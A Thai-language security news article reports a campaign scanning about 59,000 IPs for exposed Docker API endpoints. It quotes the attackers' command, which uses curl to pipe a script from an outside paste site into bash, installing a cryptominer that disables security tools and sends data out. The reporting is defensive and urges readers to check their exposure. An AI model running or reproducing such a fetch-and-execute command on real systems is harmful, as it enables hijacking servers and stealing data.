พบแฮ็กเกอร์กำลังสแกนหา Docker ผ่านทางออนไลน์ไปแล้วถึง 59,000 ไอพี

Bad Packets ผู้เชี่ยวชาญด้านภัยคุกคามทางไซเบอร์ได้ออกมาเตือนถึงความพยามในการสแกนหา Docker เพื่อหา API Endpoint ที่ให้เข้าถึงจากออนไลน์ โดยมีการสแกนไปแล้วถึง 59,000 ไอพี

Credit: Andrey Popov/ShutterStock

เมื่อวันที่ 24 พฤศจิกายนที่ผ่านมาได้มีการค้นพบการสแกนเพื่อหาเหยื่อที่ใช้งาน Docker เพื่อค้นหา API Endpoint ที่สามารถใช้งานได้ผ่านทางออนไลน์ โดยแฮ็กเกอร์จะเข้าไปสั่งเริ่ม Alpine Linux Container ด้วยคำสั่งว่า “chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;” โดยท้ายที่สุดสคิร์ปต์ดังกล่าวจะไปเรียกติดตั้งตัวขุดเหมือง 

นอกจากนี้ผู้เชี่ยวชาญยังเผยว่าสคิร์ปต์ยังได้มีการสั่งปิดผลิตภัณฑ์ด้าน Security และสั่งปิดโปรเซส lso ซึ่งเป็นการกำจัดตัวขุดเหมือนอื่นๆ รวมถึงยังมีการลอบขโมยข้อมูลส่งกับไปหาเซิร์ฟเวอร์ด้วย ด้วยเหตุนี้เองเมื่อรู้เช่นนี้แล้วก็หมั่นตรวจสอบการใช้งานของเราเองด้วยนะครับว่ามีการเข้าถึงผ่านทางออนไลน์อย่างไร

ที่มา :  https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/

About nattakon

จบการศึกษา ปริญญาตรีและโท สาขาวิศวกรรมคอมพิวเตอร์ KMITL เคยทำงานด้าน Engineer/Presale ดูแลผลิตภัณฑ์ด้าน Network Security และ Public Cloud ในประเทศ ปัจจุบันเป็นนักเขียน Full-time ที่ TechTalkThai

Check Also

Microsoft ออกแพตช์ประจำเดือนธันวาคม 2024 แก้ไขช่องโหว่ Zero-day และอีก 71 รายการ

Microsoft ปล่อยแพตช์ความปลอดภัยประจำเดือนธันวาคม 2024 แก้ไขช่องโหว่ทั้งหมด 71 รายการ รวมถึงช่องโหว่ Zero-day ที่กำลังถูกโจมตีอยู่ 1 รายการ

Tuskira เปิดตัวพร้อมทุน 28.5 ล้านดอลลาร์ ยกระดับความมั่นคงปลอดภัยไซเบอร์ด้วย AI

สตาร์ทอัพด้านการตรวจจับภัยคุกคาม Tuskira เปิดตัวพร้อมระดมทุน 28.5 ล้านดอลลาร์จากกลุ่มนักลงทุนที่นำโดย Intel Capital และ SYN Ventures มุ่งเร่งนวัตกรรม AI การผสานระบบ และยกระดับการรักษาความมั่นคงปลอดภัยไซเบอร์ขององค์กรด้วยกลยุทธ์เชิงรุกที่รวมเครื่องมือเข้าด้วยกันและลดความเสี่ยงแบบเรียลไทม์